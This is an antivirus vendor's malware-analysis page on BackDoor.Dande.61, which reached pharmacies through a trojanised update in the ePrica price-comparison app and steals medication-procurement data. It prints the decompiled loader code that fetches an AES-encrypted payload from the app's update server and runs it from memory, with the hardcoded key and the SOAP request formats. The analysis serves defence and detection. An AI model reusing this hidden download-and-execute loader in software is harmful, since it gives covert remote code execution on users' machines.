Bibliothèque
Ma bibliothèque

+ Ajouter à la bibliothèque

Contacter-nous !
Support 24/24 | Rules regarding submitting

Nous téléphoner

0 825 300 230

Forum

Vos requêtes

  • Toutes : -
  • Non clôturées : -
  • Dernière : le -

Nous téléphoner

0 825 300 230

Profil

BackDoor.Dande.61

Added to the Dr.Web virus database: 2016-12-08

Virus description added:

SHA1:

installer64b57c90bcbf71ae4a28f8f742821c123bfb8061
driver 165384de87e53a9249553b6f38c9b48da3ec4e041
driver 21a22a6c9cd04b25a108e08aa6e35637154e5aee6
Trojan781262c98f1bdd4e61cd888f71ccc712ff296bf6
PriceCompareLoader.dllb3915aa38551a5b5270b23e372ae1241161ec598
PriceComparePm.dll014a9166c5516a5193b6b638eeae635170f25829

Backdoor Trojan designed to steal information about a medication procurement from drugstores and pharmaceutical companies. Doctor Web examined a source of infection with this version of malicious program. In the researched sample, driver tapec.sys (Dande), that launches all other Trojan components, was created on April 28, 2016.

04/28/16 11:34:59.9062500000;12/11/02 23:14:32.0000000000;06/16/16 12:28:52.5468750000 C:\Windows\System32\drivers\msteeb.sys
04/28/16 11:35:00.2031250000;04/15/08 17:00:00.0000000000;06/16/16 12:28:52.5312500000 C:\Windows\System32\drivers\tapec.sys
04/28/16 11:35:01.0468750000;12/25/08 22:00:20.0000000000;06/16/16 12:28:53.6250000000 C:\Windows\System32\drivers\telephona.cpl

Search for the string tapec.sys showed that it is present in two files:

  1. pagefile.sys (paging file)
  2. Avast\URL.db (Avast log in the format of database sqllite3)

The database contains the following tables:

sqlite> .schema
CREATE TABLE Paths (Time INTEGER, Path TEXT COLLATE NOCASE UNIQUE, ShortHash INTEGER, LongHash BLOB PRIMARY KEY, Flags INTEGER);
CREATE TABLE URLs (Time INTEGER, URL TEXT, ShortHash INTEGER, LongHash BLOB PRIMARY KEY, Flags INTEGER);
CREATE INDEX PathsPathIndex ON Paths (Path COLLATE NOCASE);
CREATE INDEX URLsShortHashIndex ON URLs (ShortHash);

where Paths is a list of programs launched on the examined computer. There was a second search in the range of one day before and one day right after creation of the malicious driver. It showed two interesting events:

1461832499|D:\ePrica\App\PriceCompareLoader.dll|2038233152|
1461832500|C:\WINDOWS\system32\drivers\tapec.sys|2510498394|

The malicious driver was created one second after the launch of the library D:\ePrica\App\PriceCompareLoader.dll, which is a part of the application ePrica.

ePrica research

ePrica is the application that was developed by a company called “Spargo Tekhnologii”. It allows executives of drugstores to analyze medication prices and to choose the best supplier. PriceCompareLoader.dll library used by this program has three exportable functions:

MemoryLoadLibrary
MemoryGetProcAddress
MemoryFreeLibrary

All these functions launch the libraries in the memory. PriceCompareLoader.dll is called from PriceComparePm.dll. The library is obfuscated with .NET Reactor 4.7. This library tries to download a payload from the website, decrypt it with the AES algorithm and launch from the memory. Below is the code of file downloading and launching:


public static void Download()
{
    try
    {
        if (!UpdateDownloader.bool_0)
        {
            Guid sessionId = Settings.SESSION.SessionId;
            if (!(sessionId == Guid.Empty))
            {
                UpdateService updateService = new UpdateService();
                MyUtils.ConfigureWebServiceProxy(updateService, false);
                int @int = SettingsAllUsers.GetInt("UPDATE_FLAG");
                if (@int >= 0)
                {
                    bool success = false;
                    if (@int > 0)
                    {
                        success = true;
                    }
                    DateTime date = SettingsAllUsers.GetDate("UPDATE_FLAG_MODIFIED");
                    updateService.ResetUpdateFlag(sessionId, success, date);
                    SettingsAllUsers.SetDirect("UPDATE_FLAG", -1);
                }
                else if (updateService.CheckUpdateFlag(sessionId))
                {
                    byte[] array = new byte[UpdateDownloader.qOmraPoxb];
                    int num = 0;
                    while (true)
                    {
                        byte[] array2 = updateService.Load(sessionId, num);
                        try
                        {
                            array2 = AesEncryptor.Decrypt(array2, UpdateDownloader.byte_0, UpdateDownloader.byte_1);
                        }
                        catch
                        {
                            num = 0;
                            break;
                        }
                        int num2 = 0;
                        if (array2 != null)
                        {
                            num2 = array2.Length;
                        }
                        if (num2 == 0 || num + num2 > UpdateDownloader.qOmraPoxb)
                        {
                            break;
                        }
                        Array.Copy(array2, 0, array, num, num2);
                        num += num2;
                    }
                    if (num > 0 && num <= UpdateDownloader.qOmraPoxb)
                    {
                        Array.Resize<byte>(ref array, num);
                        UpdateDownloader.bool_0 = true;
                        Thread thread = new Thread(new ParameterizedThreadStart(UpdateDownloader.smethod_0));
                        thread.Start(array);
                    }
                    else
                    {
                        updateService.ResetUpdateFlag(sessionId, false, DateTime.get_Now());
                    }
                }
            }
        }
    }
    catch
    {
    }
}

AES key and vector:


static UpdateDownloader()
{
    Class3.uNNUGvkzmboS2();
    UpdateDownloader.qOmraPoxb = 2097152;
    UpdateDownloader.byte_0 = new byte[]
    {
        57,
        75,
        140,
        42,
        22,
        100,
        103,
        39,
        168,
        179,
        86,
        81,
        247,
        11,
        224,
        242,
        23,
        154,
        186,
        128,
        130,
        171,
        200,
        170,
        128,
        217,
        247,
        238,
        80,
        200,
        146,
        12
    };
    UpdateDownloader.byte_1 = new byte[]
    {
        88,
        199,
        157,
        130,
        155,
        231,
        168,
        148,
        97,
        45,
        227,
        215,
        3,
        234,
        61,
        172
    };
}

Update check code:


private static void smethod_0(object object_0)
{
    bool flag = false;
    try
    {
        byte[] array = object_0 as byte[];
        if (array != null)
        {
            SettingsAllUsers.SetDirect("UPDATE_FLAG", -2);
            flag = CheckUpdate.Check(array);
        }
    }
    catch
    {
    }
    finally
    {
        try
        {
            if (flag)
            {
                SettingsAllUsers.SetDirect("UPDATE_FLAG", 1);
            }
            else
            {
                SettingsAllUsers.SetDirect("UPDATE_FLAG", 0);
            }
            SettingsAllUsers.SetDirect("UPDATE_FLAG_MODIFIED", DateTime.get_Now());
        }
        catch
        {
        }
        UpdateDownloader.bool_0 = false;
    }
}

Code for launching from the memory:


public static bool Check(byte[] byte_0)
{
    IntPtr intPtr = IntPtr.Zero;
    IntPtr intPtr2 = IntPtr.Zero;
    try
    {
        if (byte_0 == null)
        {
            bool result = false;
            return result;
        }
        intPtr2 = Marshal.AllocHGlobal(byte_0.Length);
        Marshal.Copy(byte_0, 0, intPtr2, byte_0.Length);
        intPtr = CheckUpdate.Class1.MemoryLoadLibrary(intPtr2);
        if (intPtr == IntPtr.Zero)
        {
            bool result = false;
            return result;
        }
        IntPtr intPtr3 = CheckUpdate.Class1.MemoryGetProcAddress(intPtr, "ModuleFunction");
        if (intPtr3 == IntPtr.Zero)
        {
            bool result = false;
            return result;
        }
        CheckUpdate.Delegate0 @delegate = (CheckUpdate.Delegate0)Marshal.GetDelegateForFunctionPointer(intPtr3, typeof(CheckUpdate.Delegate0));
        @delegate(IntPtr.Zero, IntPtr.Zero, IntPtr.Zero);
    }
    catch
    {
        bool result = false;
        return result;
    }
    finally
    {
        try
        {
            if (intPtr != IntPtr.Zero)
            {
                CheckUpdate.Class1.MemoryFreeLibrary(intPtr);
            }
        }
        catch
        {
        }
        try
        {
            if (intPtr2 != IntPtr.Zero)
            {
                Marshal.FreeHGlobal(intPtr2);
            }
        }
        catch
        {
        }
    }
    return true;
}

Protocol

The library exchanges information with a remote server using the SOAP HTTP protocol. For authorization, POST request is sent to the server http://ws.eprica.ru/app/InfoService.asmx with the following header:

'SOAPAction': "http://www.spargo.ru/es/LoginEx"

Authorization data has the following structure:


<?xml version="1.0" encoding="utf-8"?>
    <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
        <soap:Body>
            <LoginEx xmlns="http://www.spargo.ru/es">
                <wsUser>
                    <LicenseNumber>071122-164229</LicenseNumber>
                    <SessionId>00000000-0000-0000-0000-000000000000</SessionId>
                    <GuidDrugstore>00000000-0000-0000-0000-000000000000</GuidDrugstore>
                    <KodDrugstore>105570</KodDrugstore>
                    <Login>Администратор</Login>
                    <PasswordHash>/9P+uFEEaqgoKiKOQOZnOw==</PasswordHash>
                    <Version>4.0.26.30</Version>
                    <ComputerInfoHash>NVQKLJBTV1</ComputerInfoHash>
                    <AccessCode>ED287118-3933-4E97-95A7-9D3C4CF94421</AccessCode>
                    <DownloadedUpdateVersion>4.0.23.17</DownloadedUpdateVersion>
                </wsUser>
                <password>1230456</password>
            </LoginEx>
        </soap:Body>
    </soap:Envelope>

The answer to the request is the following sessionId:


<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
    <soap:Body>
        <LoginExResponse xmlns="http://www.spargo.ru/es">
            <LoginExResult>
                <SessionId>64ad19a5-d8c3-481c-a95e-95ce9a3722ff</SessionId>
                <AccessCodeNew>F06BBB44-558B-4C43-A278-1E7B787FE986</AccessCodeNew>
                <ContentServiceUrl>https://pharmadata.ru/content/ContentUploadService.asmx</ContentServiceUrl>
                <PackSize>0</PackSize>
                <MobOrderCheckIntervalSec>300</MobOrderCheckIntervalSec>
                <IsMobOrderDisabled>false</IsMobOrderDisabled>
                <HasMobOrder>false</HasMobOrder>
                <LastLogSave>2016-12-08T12:41:44.0065516+03:00</LastLogSave>
            </LoginExResult>
        </LoginExResponse>
    </soap:Body>
</soap:Envelope>

To receive a payload, request is sent to the server http://ws.eprica.ru/app/UpdateService.asmx with the following header:

"SOAPAction": 'http://www.spargo.ru/es/Load'

The following XML file is sent:


<?xml version="1.0" encoding="utf-8"?>
    <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
      <soap:Body>
        <Load xmlns="http://www.spargo.ru/es">
          <guidSession>%s</guidSession>
          <offset>%d</offset>
        </Load>
      </soap:Body>
    </soap:Envelope>

The offset parameter is used because file is sent by piecemeal. The server’s response looks as follows:


<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
    <soap:Body>
        <LoadResponse xmlns="http://www.spargo.ru/es">
            <LoadResult>fzzvOyrIohvnXggrGy35PtG9BG79/v7MebMKMMu+lN...
            </LoadResult>
        </LoadResponse>
    </soap:Body>
</soap:Envelope>

The payload, that is sent to base64, is encrypted with the AES algorithm. It contains the BackDoor.Dande installer. The library itself has a valid digital signature SPARGO Technologies:

During the installation process, BackDoor.Dande deletes files of the old version of Dande: isaPnpPrt.sys, RpcSsPrt.sys, BackDoor.Dande.2. The Trojan chooses a random name from the folder %SYSTEM32%\drivers\ and saves its copy with the same name but adds several arbitrary symbols in the end. The Trojan extracts files that need to be saved from sections .cdata and .bdata. The data is stored in the container BackDoor.Dande.2. The name of the driver that has SHA1 65384de87e53a9249553b6f38c9b48da3ec4e041 is updated to the encrypted container. Thus, the digital signature, which has been valid, is deleted. In all other respects, the installation procedure is similar to the one of BackDoor.Dande.2.

News about the Trojan

Recommandations pour le traitement

  1. Si le système d'exploitation peut être démarré (en mode normal ou en mode sans échec), téléchargez Dr.Web Security Space et lancez un scan complet de votre ordinateur et de tous les supports amovibles que vous utilisez. En savoir plus sur Dr.Web Security Space.
  2. Si le démarrage du système d'exploitation est impossible, veuillez modifier les paramètres du BIOS de votre ordinateur pour démarrer votre ordinateur via CD/DVD ou clé USB. Téléchargez l'image du disque de secours de restauration du système Dr.Web® LiveDisk ou l'utilitaire pour enregistrer Dr.Web® LiveDisk sur une clé USB, puis préparez la clé USB appropriée. Démarrez l'ordinateur à l'aide de cette clé et lancez le scan complet et le traitement des menaces détectées.

Veuillez lancer le scan complet du système à l'aide de Dr.Web Antivirus pour Mac OS.

Veuillez lancer le scan complet de toutes les partitions du disque à l'aide de Dr.Web Antivirus pour Linux.

  1. Si votre appareil mobile fonctionne correctement, veuillez télécharger et installer sur votre appareil mobile Dr.Web pour Android. Lancez un scan complet et suivez les recommandations sur la neutralisation des menaces détectées.
  2. Si l'appareil mobile est bloqué par le Trojan de la famille Android.Locker (un message sur la violation grave de la loi ou la demande d'une rançon est affiché sur l'écran de l'appareil mobile), procédez comme suit:
    • démarrez votre Smartphone ou votre tablette en mode sans échec (si vous ne savez pas comment faire, consultez la documentation de l'appareil mobile ou contactez le fabricant) ;
    • puis téléchargez et installez sur votre appareil mobile Dr.Web pour Android et lancez un scan complet puis suivez les recommandations sur la neutralisation des menaces détectées ;
    • Débranchez votre appareil et rebranchez-le.

En savoir plus sur Dr.Web pour Android